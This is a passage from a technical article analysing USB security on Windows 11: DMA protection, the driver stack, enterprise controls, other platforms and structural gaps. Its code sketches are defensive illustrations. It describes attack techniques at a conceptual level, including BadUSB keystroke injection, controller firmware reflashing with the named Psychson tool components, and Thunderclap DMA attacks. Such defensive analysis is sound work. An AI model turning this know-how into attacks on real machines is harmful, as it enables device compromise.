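// Parameter names and result labels are illustrative, not Windows APIs.
function dmaDecision({ kdpArmed, pcieTunneled, driverRemappingCompatible, userSignedIn }) {
  // Devices that are not PCIe-class peripherals (e.g. a USB 2.0 thumb
  // drive) are outside what KDP polices.
  if (!pcieTunneled) return "not-applicable";
  if (!kdpArmed) return "unrestricted";
  // Opted-in drivers are confined to their own translation domain.
  if (driverRemappingCompatible) return "sandboxed";
  // Drivers that did not opt in wait for sign-in or screen unlock.
  return userSignedIn ? "allowed-without-remapping" : "blocked";
}

console.log(dmaDecision({
  kdpArmed: true, pcieTunneled: true,
  driverRemappingCompatible: false, userSignedIn: false,
}));
```

The first branch is the one that matters for BadUSB: a keystroke-injecting thumb drive never reaches any of the later checks.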

An IOMMU is a hardware unit that sits between peripherals and main memory, translating peripheral-issued DMA addresses through a per-device page table the operating system controls. Intel's implementation is called VT-d; AMD's is AMD-Vi; ARM platforms expose a System Memory Management Unit (SMMU). With an IOMMU enabled and configured by the OS, a peripheral that issues a DMA read to an address outside its sandboxed memory region gets a translation fault instead of a successful read. Without an IOMMU -- or with the IOMMU not enforcing policy on a given device -- peripheral DMA is unrestricted physical-address access to the kernel.
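The translation-fault behavior can be illustrated with a toy model. Real IOMMUs use multi-level hardware page tables and permission bits; the `ToyIommu` class below is a deliberately simplified, hypothetical stand-in with a single-level table per device and a 4 KiB page size assumed for the example.

```javascript
// Sketch only: a toy per-device address translator, not a hardware model.
const PAGE_SIZE = 4096;

class ToyIommu {
  constructor() {
    this.pageTables = new Map();  // deviceId -> Map(ioPage -> physicalPage)
  }

  // The OS grants one device access to one physical page.
  map(deviceId, ioPage, physicalPage) {
    if (!this.pageTables.has(deviceId)) this.pageTables.set(deviceId, new Map());
    this.pageTables.get(deviceId).set(ioPage, physicalPage);
  }

  // A device-issued address either translates or faults; it never
  // reaches physical memory the OS did not map for that device.
  translate(deviceId, ioAddress) {
    const table = this.pageTables.get(deviceId);
    const ioPage = Math.floor(ioAddress / PAGE_SIZE);
    if (!table || !table.has(ioPage)) {
      throw new Error("translation fault: device " + deviceId +
        " address 0x" + ioAddress.toString(16));
    }
    return table.get(ioPage) * PAGE_SIZE + (ioAddress % PAGE_SIZE);
  }
}

const iommu = new ToyIommu();
iommu.map("tb-dock", 0, 0x40);  // hypothetical device name and page numbers
console.log(iommu.translate("tb-dock", 0x10).toString(16));
try {
  iommu.translate("tb-dock", 0x5000);  // outside the mapped window
} catch (e) {
  console.log(e.message);
}
```

Removing the `translate` step entirely is the no-IOMMU case: the device-supplied address is used as a physical address directly.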

A USB 2.0 thumb drive performs no DMA. KDP is silent on it.

Note: Kernel DMA Protection is a Thunderbolt-and-PCIe-over-USB-C defense. It does not apply to USB 2.0 mass storage, HID, or audio. It does not apply to a USB 3.x flash drive talking the Mass Storage Class. It applies to PCIe peripherals tunneled over the same physical connector. If your threat model is "a malicious thumb drive types Mimikatz into my Start menu," KDP is not in your defense chain at all.

flowchart TD
    subgraph HC["Host controller layer"]
        XHCI["usbxhci.sys<br/>USB 3.0 host controller driver"]
        UCX["Ucx01000.sys<br/>USB host controller extension (KMDF)"]
    end
    subgraph Hub["Hub layer"]
        H["usbhub3.sys<br/>USB 3.0 hub and enumeration"]
    end
    subgraph Comp["Composite split"]
        CCGP["usbccgp.sys<br/>generic parent: one PDO per interface"]
    end
    subgraph Class["Class-driver layer"]
        HID["hidclass.sys + hidusb.sys<br/>HID class"]
        STOR["usbstor.sys<br/>Mass Storage Class"]
        AUDIO["usbaudio2.sys<br/>Audio Class 2.0"]
        VIDEO["usbvideo.sys<br/>USB Video Class (UVC)"]
        SER["usbser.sys<br/>CDC Serial"]
        WIN["winusb.sys<br/>Generic vendor access"]
        UCM["UcmCx / UcmUcsiCx / UcmTcpciCx<br/>USB Type-C connector"]
    end
    XHCI --> UCX
    UCX --> H
    H --> CCGP
    CCGP --> HID
    CCGP --> STOR
    CCGP --> AUDIO
    CCGP --> VIDEO
    CCGP --> SER
    CCGP --> WIN
    CCGP --> UCM

Sources for the architecture diagram, layer by layer: [@ms-usb-3-0-stack] for the host-controller and hub layers (usbxhci.sys, Ucx01000.sys, usbhub3.sys); [@ms-ccgp] for the composite parent driver usbccgp.sys; [@ms-winusb] for winusb.sys; [@ms-typec] for the UCM class-extension family.

Key idea: Of the nine stages Windows executes between physical insertion and a class-driver attach, only two -- Stages 7 and 9 -- consult anything Windows holds as cryptographic truth. The other seven trust whatever the peripheral says, the moment the peripheral says it. KMCS certifies the driver, not the device. KDP certifies the bus, not the descriptor. The descriptor-trust gap is structural to USB; it lives in Stages 2 through 6, and no Windows-side defense has ever proposed to close it.

Nine stages. Two of them are the security model the article's reader thought was the security model. The other seven are descriptor parsing, ID synthesis, and INF search -- and they trust whatever the peripheral declares.

6. What Ships in Windows 11 24H2 / 25H2

Section 5 was the pipeline. This section is the roster: every Windows-11-shipping mechanism that defends the USB attack surface, what it actually does, and -- in the table at the end of this section -- what it does not.

The inbox class-driver roster. The class drivers that bind to a USB device after Stage 6 are mostly Microsoft-authored and ship in every Windows 11 SKU. They include hidclass.sys and hidusb.sys for keyboards, mice, joysticks, and HID-over-USB; usbstor.sys for the Mass Storage Class; usbprint.sys for the Printer Class; usbaudio2.sys for USB Audio Class 2.0; usbvideo.sys for the USB Video Class (webcams); usbser.sys for the CDC Serial class; winusb.sys for vendor-specific generic-access scenarios; the UcmCx.sys family for Type-C connector management; Hidi2c.sys for HID-over-I2C; and wpdusb.sys for MTP / PTP Windows Portable Devices [@ms-usb-3-0-stack] [@ms-typec] [@ms-winusb]. Every class driver in that list is signed under the Kernel-Mode Code Signing policy [@ms-kmcs]. Every class driver in that list trusts the descriptor that selected it.

Hidi2c.sys is the sleeper attack surface on most laptops. Internal precision touchpads, fingerprint readers, and increasingly proximity sensors are HID-over-I2C devices wired to the chipset, not the external USB bus. They are not subject to USB-side Device Control policy because they are not USB devices; they are HID devices that happen to talk a different transport. The HID class definition is the same as it is on USB.

Kernel DMA Protection policy surface. KDP exposes three Group Policy values on DMAGuard\DeviceEnumerationPolicy, which governs peripherals whose drivers are not DMA-remapping compatible: Block all (the most restrictive posture), Only after log in / screen unlock (the default), and Allow all (the least restrictive posture). The Microsoft Learn reference states the default behavior verbatim: "By default, peripherals with DMA Remapping incompatible drivers are blocked from starting and performing DMA until an authorized user signs into the system or unlocks the screen" [@ms-kdp]. KDP's silicon and firmware prerequisites (IOMMU support, UEFI DMAR / IVRS publication) are non-trivial; on many post-2019 OEM platforms the toggle ships in BIOS but stays off until an administrator changes the firmware setting.

The ASR + Device Control + GPO triangle. The three deployable layers of enterprise USB policy on Windows 11 are an Attack Surface Reduction rule, the Microsoft Defender for Endpoint Device Control framework, and the older Group Policy Device Installation Restrictions family.

Attack Surface Reduction is a set of policy-defined kernel-and-userland rules in Microsoft Defender for Endpoint that block specific abusable behaviors. Each rule is identified by a GUID and toggled per-rule by Group Policy, Intune, or PowerShell. ASR rules sit in front of common execution sinks (Office child processes, script-from-email runs, USB-borne executables) and refuse the operation when the rule is in Block mode. They are a policy layer on top of the Windows execution model, not a re-design of it.

The ASR rule that targets USB-borne malware is "Block untrusted and unsigned processes that run from USB", GUID b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4 on Microsoft's ASR-rule-to-GUID matrix [@ms-asr-rules]. (Several published guides cite the unrelated GUID d4f940ab-401b-4efc-aadc-ad5f3c50688a for the same rule; per the matrix, that GUID is actually "Block all Office applications from creating child processes". The USB GUID given above is the one to deploy.)

Microsoft Defender for Endpoint Device Control is the granular layer: groups, rules, and settings let an administrator grant read-only access to corporate encrypted USB storage, deny writes to personal USB storage, allow corporate HID by VID/PID/serial, and compose a dozen other primitives per user [@ms-devcontrol].

The older Group Policy Device Installation Restrictions framework has eight policies (AllowedDeviceClasses, DenyDeviceClasses, AllowedDeviceIDs, DenyDeviceIDs, and so on) and uses Setup Class GUIDs such as GUID_DEVCLASS_USB ({36FC9E60-C465-11CF-8056-444553540000}) and GUID_DEVCLASS_HIDCLASS ({745A17A0-74D3-11D0-B6FE-00A0C90F57DA}) for class-wide rules [@ms-gpo-devinstall] [@ms-devsetupclasses].
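The Device Control idea described above (match a device on VID/PID/serial, grant access per operation, deny everything else) can be sketched as a first-match rule table. This is a minimal illustration only: the `policy` shape, the `matches` and `evaluate` helpers, and the VID/PID/serial values are all hypothetical, and the real Defender for Endpoint Device Control schema is considerably richer than this.

```javascript
// Hypothetical, simplified policy model. NOT the real Device Control schema.
const policy = {
  // Default-deny: anything no rule names gets no access.
  defaultAccess: { read: false, write: false, execute: false },
  rules: [
    // One specific corporate stick (illustrative IDs): read-only.
    {
      match: { vid: "1234", pid: "abcd", serial: "CORP-0001" },
      access: { read: true, write: false, execute: false },
    },
    // Any unit of one vendor/product pair, whatever its serial: read + write.
    {
      match: { vid: "5678", pid: "0001" },
      access: { read: true, write: true, execute: false },
    },
  ],
};

// A rule matches when every field it names equals the device's field,
// compared case-insensitively.
function matches(rule, device) {
  return Object.entries(rule.match).every(
    ([key, value]) => String(device[key] ?? "").toLowerCase() === value.toLowerCase()
  );
}

// First matching rule wins; with no match, fall back to the default posture.
function evaluate(policy, device, operation) {
  const rule = policy.rules.find((r) => matches(r, device));
  const access = rule ? rule.access : policy.defaultAccess;
  return access[operation] === true;
}

const corpStick = { vid: "1234", pid: "ABCD", serial: "corp-0001" };
const unknownStick = { vid: "ffff", pid: "0001", serial: "X" };
console.log(evaluate(policy, corpStick, "read"), evaluate(policy, unknownStick, "read"));
```

Note what the sketch keys on: every field in `match` is a value the device itself reports, so an allow-list of this kind constrains honest devices and raises the bar for attackers, but it inherits the descriptor-trust premise rather than removing it.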

BitLocker To Go. The full-volume-encryption story for removable media on Windows has been BitLocker To Go since Windows 7. On Windows 11 the default cipher for removable data drives is AES-CBC 128-bit, kept for compatibility with older Windows versions (administrators can select XTS-AES-128 or XTS-AES-256 through the removable-drive option of the Group Policy "Choose drive encryption method and cipher strength"), and the Group Policy "Deny write access to removable drives not protected by BitLocker" is the enterprise opt-in to force the contract [@ms-bitlocker]. BitLocker To Go protects the data on a USB stick if it is lost or stolen. It does not protect the host from a malicious peripheral, because the malicious peripheral does not present itself as a BitLocker-managed volume; it presents itself as whatever it pleases at Stage 5.

USB-IF Authentication Specification Revision 1.0. Published in the form of an ECN and errata dated January 7, 2019 [@usbif-auth-spec], this specification defines cryptographic peripheral identity using ECDSA P-256, X.509 certificate chains, and SHA-256 hashing -- the same primitives Windows already uses for KMCS and BitLocker. The standard exists. Windows ships no in-box consumer. No major host operating system in 2026 consumes it. The 2019 promise of cryptographic device identity has been seven years away for seven years.

Note: USB-IF Authentication 1.0 is the only mechanism in this entire roster that would architecturally close the BadUSB-class HID-injection problem. Every other defense in the table below mitigates the symptoms of the descriptor-trust gap. USB-IF Authentication would close the gap itself. It was published as an ECN seven years ago [@usbif-auth-spec]. Windows does not consume it. macOS does not consume it. Linux does not consume it. The defense is not absent because it is hard; it is absent because no host operating system has committed engineering to it. That is the institutional gap.

The SOTA roster, in a comparison table:

| Mechanism | What it gates | Attack class addressed | Does NOT address |
| --- | --- | --- | --- |
| KMCS [@ms-kmcs] | Loading of unsigned `.sys` files into ring zero | Arbitrary kernel-mode driver loads | Descriptors a signed driver consumes |
| Kernel DMA Protection [@ms-kdp] | Pre-login + post-login DMA from Thunderbolt / USB4 PCIe endpoints | Thunderclap-class DMA attacks | USB 2.0/3.x storage and HID; pre-DMAR firmware platforms |
| ASR USB rule `b2b3f03d-...` [@ms-asr-rules] | Unsigned and untrusted process launch from USB-mounted volume | AutoRun-like execution; mass-storage-borne executables | HID-injection (no process is launched); descriptor-parser bugs |
| MDE Device Control [@ms-devcontrol] | Per-VID/PID/serial allow-deny on read, write, execute, file-walk | Any policy-named USB device class | Devices the policy explicitly allows |
| GPO Device Installation Restrictions [@ms-gpo-devinstall] [@ms-devsetupclasses] | Setup-class-wide allow-deny by Device Setup Class GUID | Whole-class blocks (e.g. all USB Storage) | Devices the policy allow-lists |
| BitLocker To Go [@ms-bitlocker] | Encryption of data at rest on removable USB volumes | Lost / stolen thumb drive | Malicious peripheral; host compromise |
| AutoRun-disable (KB971029 era) [@krebs-feb2011] [@wiki-autorun] | `autorun.inf`-driven AutoPlay launch on insert | Conficker-class AutoRun worms | HID injection; descriptor parser bugs |
| Driver Block List / Vulnerable Driver Block List [@ms-kmcs] | Loading of named known-bad signed `.sys` files | Bring-Your-Own-Vulnerable-Driver | New (unlisted) malicious-but-signed driver |
| USB-IF Authentication 1.0 [@usbif-auth-spec] | Cryptographic peripheral identity at enumeration | Descriptor-trust impossibility result (BadUSB) | (Standard exists; Windows does not consume it) |

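```javascript
// Emulates the PowerShell check:
//   $p = Get-MpPreference
//   $p.AttackSurfaceReductionRules_Ids
//   $p.AttackSurfaceReductionRules_Actions
// In a real Windows 11 enterprise rollout, run the PowerShell as administrator.

// "Block untrusted and unsigned processes that run from USB"
const USB_RULE_GUID = "b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4";
const ACTION = { DISABLED: 0, BLOCK: 1, AUDIT: 2, WARN: 6 };

// Sample output that a healthy enterprise endpoint should produce.
const sample = {
  ids: [
    USB_RULE_GUID,
    "d4f940ab-401b-4efc-aadc-ad5f3c50688a",
    "75668c1f-73b5-4cf0-bb93-3ecf5cb7cc84",
  ],
  actions: [ACTION.BLOCK, ACTION.BLOCK, ACTION.BLOCK],
};

// Assumed completion of the check: the two arrays are parallel, so the rule's
// action sits at the same index as its GUID. A missing GUID counts as disabled.
const index = sample.ids.findIndex((id) => id.toLowerCase() === USB_RULE_GUID);
const action = index === -1 ? ACTION.DISABLED : sample.actions[index];
console.log(action === ACTION.BLOCK ? "USB ASR rule: Block" : "USB ASR rule: not in Block mode");
```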

Eight Windows-shipping mechanisms, one missing implementation. The implementation gap is structural: the only complete defense in the roster is the one Windows does not ship.

7. USB Security on Non-Windows Platforms

Windows is not the only OS that inherits USB's descriptor-trust premise. Every host operating system since 1996 has inherited the same contract; each has staked out a different position on how to live with it. The contrast clarifies what Windows chose.

macOS on Apple Silicon (Ventura, 2022; extended in Sequoia, 2024). Apple Support describes the prompt: "When you use a new or unknown USB accessory, Thunderbolt accessory, or SD card with your Mac laptop with Apple silicon, you get an alert that asks you to allow the accessory to connect" [@apple-mac-usb]. The same page documents the four user-selectable modes -- Always ask, Ask for new accessories, Automatically allow when unlocked, Always allow -- and the lockout window: "If your Mac has been locked for 3 or more days, you might need to unlock it to use a previously allowed accessory again" [@apple-mac-usb]. Apple is the only major host OS that ships a user-facing prompt as the default posture.

Apple Silicon Macs appear to enforce the accessory prompt at the hardware level through the Secure Enclave Processor, not purely in software. This is architectural inference from Apple's general SEP-policy documentation; Apple Support pages describe the user-visible behavior, not the SEP-side enforcement chain. If the inference holds, the distinction matters because the prompt is not a kernel-side policy a privileged process can bypass.

iOS USB Restricted Mode (iOS 11.4.1, 2018; USB-C version, iOS 17+). Apple Support carries the iOS variant verbatim: "By default, you need to first unlock your iPhone or iPad to connect to an accessory or computer" [@apple-ios-usb]. Modern USB-C iPhones and iPads expose the same four-mode setting as the Mac: Always Ask, Ask for New Accessories, Automatically Allow When Unlocked, Always Allow [@apple-ios-usb]. iOS came first; macOS adopted the same UX pattern four years later.

ChromeOS. USB device authorization on ChromeOS is tied to the user-signin state; HID-class injection vectors are default-deny after suspend on managed devices. ChromeOS's documentation of the exact enforcement chain is sparse, so we will only describe what is publicly observable: the policy hooks exist, the enterprise-managed posture is default-deny, the consumer posture is default-allow.

Linux usbguard. The open-source usbguard daemon implements per-user, per-device USB authorization on top of the kernel's sysfs authorized flag [@usbguard]. The architectural cousin of Windows's Defender for Endpoint Device Control, usbguard ships a mature policy language (usbguard list-devices, usbguard allow-device, declarative rules.conf) and integrates cleanly with PolicyKit. The catch is that no major Linux distribution enables usbguard by default; it is opt-in software a sysadmin installs. Linux's kernel has had the authorized sysfs flag since 2007; what it has not had is a default-deny posture out of the box.

OpenBSD umass(4) / FreeBSD opt-in USB policy. The BSD family of operating systems ships conservative defaults: separated drivers per class, no autorun.inf-equivalent in the file manager, and a documented user-mode authorization story. Deployment scale is small; the design is included here only to illustrate that a default-deny posture is technically possible inside an inherited USB protocol contract.

The cross-platform comparison:

| Platform | Default posture | Model | Pre-login HID injection | DMA isolation |
| --- | --- | --- | --- | --- |
| Windows 11 25H2 | Allow on insert | Policy frameworks layered over descriptor trust [@ms-asr-rules] [@ms-devcontrol] [@ms-gpo-devinstall] | Mitigated only by ASR USB rule + Device Control allow-list (enterprise opt-in) | Kernel DMA Protection on capable platforms [@ms-kdp] |
| macOS (Apple Silicon) | Prompt user | User-facing approval dialog, 3-day re-prompt window [@apple-mac-usb] | Mitigated by default prompt (consumer + enterprise) | Apple-managed IOMMU + SEP policy |
| iOS (USB-C) | Locked-until-unlock | User-facing approval dialog [@apple-ios-usb] | Mitigated by default prompt | Apple-managed IOMMU + SEP policy |
| ChromeOS (managed) | Default deny after suspend | Sign-in-state-gated authorization | Mitigated by default deny (managed devices) | Platform-IOMMU policy |
| Linux + usbguard | Default deny if installed | User-space daemon over kernel `authorized` flag [@usbguard] | Mitigated if `usbguard` installed (opt-in) | Distribution-dependent |
| Stock Linux | Allow on insert | Kernel `authorized` flag exists, default is allowed | Not mitigated | Distribution-dependent |
| OpenBSD / FreeBSD | Conservative by default | Per-class driver opt-in | Not the default attack surface (low deployment) | Limited |

Two platforms (Apple's, both of them) prompt the user as the default posture. One (Linux) ships an opt-in user-space daemon. Windows is the only major platform that combines a kernel-mode device-control framework with cross-platform telemetry inside Microsoft Defender for Endpoint -- and the only one still relying entirely on enterprise opt-in for the HID-injection mitigation. The consumer default on Windows 11 25H2 is allow-on-insert.

8. What Windows Cannot Defend Against

We have walked the modern pipeline and seen the roster of defenses. We owe the reader a clean accounting of where the model is structural -- where no plausible Windows version closes the gap without breaking USB compatibility. There are five named limits, and none of them are bugs.

Limit 1: The descriptor-trust impossibility result. USB has, by specification, no out-of-band identity. A peripheral that declares itself to be a keyboard is a keyboard for purposes of the bus-enumeration handshake. The Wikipedia reference is explicit about the device-class architecture in which the peripheral, not the host, owns the declaration [@wiki-usb]. Until USB-IF Authentication (cryptographic device identity) is universal at the silicon level, this gap is structural to the protocol. Closing it on the host side -- by, say, refusing to bind a class driver until the device signs a challenge -- would break every existing USB device on the market.
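To make the self-declaration concrete, here is a small sketch of how little the host has to go on. It decodes the standard 9-byte USB interface descriptor and derives a class-based compatible ID in the `USB\Class_xx&SubClass_xx&Prot_xx` form. The helper names and the sample byte arrays are illustrative assumptions; the sketch makes no claim about how usbhub3.sys or usbccgp.sys actually implement this step.

```javascript
// Standard USB interface descriptor layout (9 bytes):
// [0] bLength  [1] bDescriptorType (0x04)  [2] bInterfaceNumber
// [3] bAlternateSetting  [4] bNumEndpoints  [5] bInterfaceClass
// [6] bInterfaceSubClass  [7] bInterfaceProtocol  [8] iInterface
function parseInterfaceDescriptor(bytes) {
  if (bytes.length < 9 || bytes[0] !== 9 || bytes[1] !== 0x04) {
    throw new Error("not a standard interface descriptor");
  }
  return { interfaceClass: bytes[5], subClass: bytes[6], protocol: bytes[7] };
}

// Two-digit uppercase hex, as used in Windows USB compatible IDs.
const hex2 = (n) => n.toString(16).toUpperCase().padStart(2, "0");

// Build the class-based compatible ID purely from the three declared bytes.
function compatibleId(d) {
  return `USB\\Class_${hex2(d.interfaceClass)}&SubClass_${hex2(d.subClass)}&Prot_${hex2(d.protocol)}`;
}

// Illustrative descriptors: a boot-protocol HID keyboard (class 0x03) and a
// SCSI bulk-only mass-storage interface (class 0x08).
const keyboardBytes = Uint8Array.from([9, 0x04, 0, 0, 1, 0x03, 0x01, 0x01, 0]);
const storageBytes = Uint8Array.from([9, 0x04, 0, 0, 2, 0x08, 0x06, 0x50, 0]);

const keyboardId = compatibleId(parseInterfaceDescriptor(keyboardBytes));
const storageId = compatibleId(parseInterfaceDescriptor(storageBytes));
console.log(keyboardId);
console.log(storageId);
```

The two devices differ by three bytes that the peripheral's firmware chooses. Nothing in the input ties those bytes to the physical object on the other end of the cable, which is the whole of Limit 1.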

Limit 2: HID-class trust is structural, not technical. A USB HID keyboard issues input events to the focused window. Windows has no way to know whether the user is the source of those events or whether a reprogrammed thumb drive is. The SR Labs disclosure is explicit about why the host cannot tell the difference: the same Phison or Cypress controller chip that ships in a thumb drive can be reprogrammed to enumerate as a HID device with a vendor-controlled report descriptor [@srlabs-badusb-pdf] [@wiki-badusb]. Microsoft Defender for Endpoint Device Control supports granular HID rules, but they are opt-in, enterprise-only, and inherently break every external keyboard the policy does not allow. The structural cost of fixing this is breaking USB.

Limit 3: Firmware reprogrammability of commodity USB controllers. Phison, Cypress, Genesys, Realtek, and the rest of the commodity USB-controller market ship field-flashable firmware. The Psychson toolchain demonstrated the Phison PS2251-03 reflash end-to-end and made it reproducible in a researcher's afternoon: "firmware patches have only been tested against PS2251-03 firmware version 1.03.53 ... DriveCom ... EmbedPayload ... Injector" [@psychson-repo]. The O.MG Cable productionized the technique inside a USB-A-to-Lightning cable form factor, proving the attack is now commercial-supply-chain-implantable [@omg-cable]. The host operating system has no view into the controller's firmware, no way to attest it, and no way to reject a peripheral that exposes a different identity post-flash than it did pre-flash.

Limit 4: Kernel DMA Protection is opt-in at three layers. Silicon (the platform must have an IOMMU), firmware (the UEFI must publish DMAR / IVRS tables), and driver (the driver must declare DmaRemappingCompatible=1 in its INF) [@ms-kdp] [@ms-dmaremap]. Many post-2019 OEM platforms ship with the firmware toggle off in BIOS. Worse, the Thunderclap research demonstrated that even on IOMMU-enabled systems, shared IOMMU contexts between a peripheral and a kernel driver are a viable attack vector [@ndss-thunderclap]. KDP also has no view at all of USB 2.0/3.x mass storage or HID, which do not perform DMA.

Windows only uses the IOMMU in limited cases and remains vulnerable. -- Markettos, Rothwell, Gutstein, Pearce, Neumann, Moore, and Watson, *Thunderclap*, NDSS 2019 [@ndss-thunderclap]

Limit 5: The descriptor parser is C code in the kernel. usbhub3.sys and usbccgp.sys are partially undocumented, are closed-source, and parse adversarial input in a memory-unsafe language. Andy Davis named the surface in 2011 [@ncc-davis-2011], and Google's syzkaller-USB program -- a public-record proxy for the wider community's descriptor-parser fuzzing effort -- has been producing kernel-side descriptor-parser bugs across host operating systems since 2017 [@syzkaller-usb]. Until the parser is rewritten in a memory-safe language, this is finite-but-non-zero kernel-mode attack surface. Linux's usbcore has ongoing Rust experiments under the upstream Rust-for-Linux project [@rust-for-linux]; Windows has not publicly committed to a similar rewrite.

Microsoft has not published the source for usbhub3.sys or usbccgp.sys; the architectural descriptions on Microsoft Learn describe the externally visible behavior of these drivers, not their internal parsing routines or memory-safety properties. Any claim about their specific implementation must be hedged accordingly. The conclusion that they parse adversarial input in C is inferred from the Windows-kernel codebase's language conventions and from the public record of descriptor-parser CVEs over the last fifteen years.

Note: None of these five limits is a Windows bug. The descriptor-trust gap is in USB. The HID-class trust gap is in the HID class definition. The firmware-reprogrammability gap is in commodity controller silicon. The KDP gap is in the layered opt-in posture of IOMMU-on-platform DMA isolation. The C-in-the-kernel gap is the price of Windows's compatibility-first kernel-driver model. Closing any one of them on the Windows side, in isolation, would either break the USB device market (limits 1-3), require commodity-silicon redesign (limit 3 again), or require a multi-year rewrite the engineering organization has not committed to (limit 5).

Key idea: The USB attack surface on Windows is the price Windows pays for being USB-compatible. Five named gaps. Zero of them are bugs. Each is a structural cost of inheriting a 1996 protocol contract written when peripheral firmware was not field-flashable and the descriptor-trust assumption was at least defensible. In 2026 the assumption is indefensible and the contract is everywhere. The defense Windows ships is the best layered mitigation anyone has built around the gap; it does not close the gap.

9. Open Problems

If the limits are structural, the open problems are sociological: who adopts the standard that already exists, who funds the rewrite that nobody has shipped, who builds the heuristic that no production OS has.

USB-IF Authentication uptake. The standard exists as a January 2019 ECN [@usbif-auth-spec]. Device-vendor uptake is near zero outside specialized industries (automotive, medical). Windows has no in-box consumer. The blocker is not cryptographic feasibility -- ECDSA P-256 over SHA-256 with X.509 chains is everyday code -- it is two-sided market adoption: peripheral vendors will not ship the silicon until host operating systems consume it; host operating systems will not consume it until enough peripherals ship it. One of the major host-OS vendors has to commit first. As of mid-2026 no one has. Current best partial result: the same ECDSA-plus-X.509 attestation pattern has been deployed at scale in adjacent ecosystems -- Apple's Find My accessory-attestation network and the automotive / medical USB-Authentication-mandatory tiers -- demonstrating that the cryptographic primitive itself is silicon-shippable; what remains is OS-side consumption.
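The "everyday code" claim is easy to illustrate. The sketch below runs a bare challenge-response with ECDSA P-256 over SHA-256 using Node's built-in `crypto` module. It is not the USB-IF Authentication wire protocol: the message flow is an assumption made for illustration, the key pair stands in for a key that would live in peripheral silicon, and X.509 chain validation is omitted entirely.

```javascript
const nodeCrypto = require("crypto");

// Device side (hypothetical): a P-256 key pair provisioned into the peripheral.
const deviceKeys = nodeCrypto.generateKeyPairSync("ec", { namedCurve: "P-256" });

// Host side: a fresh random challenge, so a recorded response cannot be replayed.
const challenge = nodeCrypto.randomBytes(32);

// Device side: sign the challenge with ECDSA over SHA-256.
const signature = nodeCrypto.sign("sha256", challenge, deviceKeys.privateKey);

// Host side: verify the response against the device's public key.
// A real design would first validate a certificate chain binding this key
// to a vendor; that step is deliberately left out of this sketch.
const accepted = nodeCrypto.verify("sha256", challenge, deviceKeys.publicKey, signature);

// The same signature must not verify against a different challenge.
const replayAccepted = nodeCrypto.verify(
  "sha256",
  nodeCrypto.randomBytes(32),
  deviceKeys.publicKey,
  signature
);

console.log({ accepted, replayAccepted });
```

A dozen lines of standard-library calls cover the primitive. What the sketch cannot show is the hard part named above: a population of peripherals that actually hold such keys, and a host that refuses to bind a class driver without them.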

HID re-enumeration detection. A thumb drive that mounts as Mass Storage, presents a benign-looking volume for a few seconds, and then re-enumerates as a composite device that adds a HID keyboard interface is the BadUSB signature [@srlabs-badusb-pdf]. No production host operating system detects this generically. A reasonable heuristic -- that a freshly enumerated device which changes its declared composition in the first fifteen seconds is suspicious -- is not in any Microsoft Defender for Endpoint hunting query as a shipped detection, only as a custom Defender XDR query an enterprise can compose itself. The heuristic is this article's own proposal, not a published primary source. Current best partial result: mature Microsoft Defender Experts customers are already deploying custom Defender XDR hunting queries that key on the post-attach composition-change pattern (typically joined against the BadUSB 200 ms keystroke-burst signature in §10.4); the detection exists in mature managed-detection-and-response practices but has not landed as a default rule in any shipping product.
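The heuristic proposed above can be sketched in a few lines. The event shape (`portPath`, `timeMs`, `interfaceClasses`) is hypothetical, as is the choice to key on the physical port; a real hunting query would have to be written against whatever enumeration telemetry the organisation actually collects.

```javascript
const HID_CLASS = 0x03;  // USB class code for HID
const WINDOW_MS = 15000; // the fifteen-second window proposed in the text

// events: enumeration records in arrival order, each of the hypothetical shape
// { portPath: string, timeMs: number, interfaceClasses: number[] }.
function findSuspiciousReenumerations(events) {
  const firstSeen = new Map(); // portPath -> { timeMs, classes }
  const alerts = [];
  for (const ev of events) {
    const first = firstSeen.get(ev.portPath);
    if (!first) {
      // First enumeration on this port: remember what the device declared.
      firstSeen.set(ev.portPath, {
        timeMs: ev.timeMs,
        classes: new Set(ev.interfaceClasses),
      });
      continue;
    }
    // Later enumeration on the same port: which classes are new?
    const elapsedMs = ev.timeMs - first.timeMs;
    const addedClasses = ev.interfaceClasses.filter((c) => !first.classes.has(c));
    if (elapsedMs <= WINDOW_MS && addedClasses.includes(HID_CLASS)) {
      alerts.push({ portPath: ev.portPath, elapsedMs, addedClasses });
    }
  }
  return alerts;
}

const sampleEvents = [
  { portPath: "1-2", timeMs: 0, interfaceClasses: [0x08] },           // mass storage only
  { portPath: "1-3", timeMs: 100, interfaceClasses: [0x03] },         // an ordinary keyboard
  { portPath: "1-2", timeMs: 4000, interfaceClasses: [0x08, 0x03] },  // same port now adds HID
  { portPath: "1-3", timeMs: 60000, interfaceClasses: [0x03, 0x08] }, // outside the window
];
const alerts = findSuspiciousReenumerations(sampleEvents);
console.log(alerts);
```

The sketch simplifies in at least two ways: it never forgets a port's first enumeration, and it cannot tell a re-enumerating device from a user quickly swapping two devices on one port. Both would need handling before this was more than a starting point for a hunting query.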

USB-C Alternate Mode trust. DisplayPort Alt Mode, Thunderbolt Alt Mode, and USB4-tunneled PCIe each cross OS / firmware / silicon boundaries inside a single physical connector. The display-side firmware attack surface, the Power Delivery contract negotiation, and the "fast charge negotiation opens a data path" primitive that has emerged in commodity fast-charging hardware are all under-explored. Microsoft's Type-C UCM stack [@ms-typec] documents the connector-manager class extensions but does not (and cannot) verify the firmware behind the alt-mode peer. Current best partial result: the UCM UcmCx / UcmUcsiCx / UcmTcpciCx class-extension family ships in every Windows 11 SKU and gives the OS a uniform connector-state view it did not have before 2016 -- the partial mitigation is the architectural plumbing, not yet a firmware-attestation policy on top of it.

Supply-chain attacks on USB controller chips. The O.MG Cable shows that BadUSB is now manufacturing-implantable [@omg-cable]; the FBI's 2020 and 2022 FIN7 advisories show organized cybercriminal actors mailing the same primitive [@bleeping-fin7]. Hardware bill-of-materials attestation, Microsoft Defender for IoT inventory, and supply-chain risk-management frameworks (NIST SP 800-161 in the United States [@nist-sp-800-161]) are nascent on the consumer side and uneven on the enterprise side. Nothing on the consumer Windows endpoint defends the user from a cable that looks like a real cable. Current best partial result: the deployable enterprise stack is USB-IF Authentication 1.0 in the small set of authentication-capable peripherals [@usbif-auth-spec], plus Microsoft Defender for IoT device-inventory telemetry, plus per-organisation bring-your-own-cable allow-list policy primitives in Defender for Endpoint Device Control [@ms-devcontrol] -- a layered stack rather than a single defence.

